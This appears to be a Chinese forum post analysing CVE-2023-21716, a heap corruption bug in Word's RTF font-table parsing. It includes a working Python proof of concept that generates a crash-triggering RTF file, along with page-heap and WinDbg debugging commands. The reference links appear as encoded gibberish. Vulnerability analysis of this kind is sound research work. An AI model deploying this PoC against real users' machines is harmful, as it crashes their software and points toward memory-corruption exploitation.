-
-
[分享] CVE-2023-21716 word漏洞分析
-
发表于: 2023-4-25 10:56
-
菜鸡学习分析文章
2月微软补丁日公开的漏洞,后poc与技术细节公开,Microsoft Word 的 RTF 解析器在处理 rtf 文件字体表(\fonttbl)中包含的过多字体(\fN)时产生的堆损坏漏洞,poc可造成word进程崩溃,预览模式下也受影响
本文使用Office 2016 32位进行分析
poc
打开poc生成的rtf文件,触发崩溃
栈回溯如下
对开启页堆,需安装wdk
或在\Windows Kits\10\Debuggers\x86\gflags.exe下
使用windbg进行分析
程序崩溃在6d3900d5,计算偏移
6d3900d5 - 6d0a0000 = 2F 00D5
在ida中定位到2F 00D5
wwlib在处理/fN时存在整数溢出
由于此处指令使用了movsx,当[esi+2]的值达到0x8000时,会进行有符号扩展,edx的高位会被扩展成FFFF,poc中的32760(0x7FF8)是触发漏洞的最小值,range(0, 32761)生成了32761组\f ,当第32761次处理\f时,edx的值为0x8002 ,但因其最高位为 1进行有符号扩展,变为0xffff8002。导致在后面的指令mov [esi+edx*2+4], cx处写入时使用了负的偏移值,造成程序崩溃。
在2F00A8,2F00CB,2F00CF ,2F00D5 处下断点观察
参考链接:
0bcK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6I4L8$3!0H3i4K6u0W2L8%4u0Y4i4K6u0r3M7s2g2T1L8r3W2U0j5i4c8A6L8$3&6K6i4K6u0r3j5%4k6W2i4K6u0V1x3U0l9J5x3#2)9J5k6o6t1I4y4K6p5$3i4K6u0V1M7Y4c8X3i4K6u0V1k6X3!0F1N6s2c8T1L8q4)9J5k6h3#2V1
cb3K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2S2L8Y4q4#2j5h3&6C8k6g2)9J5k6h3y4G2L8g2)9J5c8Y4m8G2M7%4c8Q4x3V1k6A6k6q4)9J5c8U0t1^5y4K6x3%4x3l9`.`.
import sys
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
import sys
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
gflags.exe /p /enable winword.exe /full
gflags.exe /p /enable winword.exe /full
bp wwlib+2F00A8 ".printf \" Cum: %p Font id: %p Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", eax,ecx,(esi+eax*2+4),esi,eax; gc"
bp wwlib+2F00CB ".printf \" Base: %p \\n \", poi(esi+2); gc"
bp wwlib+2F00CF ".printf \" Edx: %p from 0x%x + 0x%x*2\\n \", (ecx + edx*2),ecx,edx; gc"
bp wwlib+2F00D5 ".printf \" Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", (esi+edx*2+4),esi,edx; gc"
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
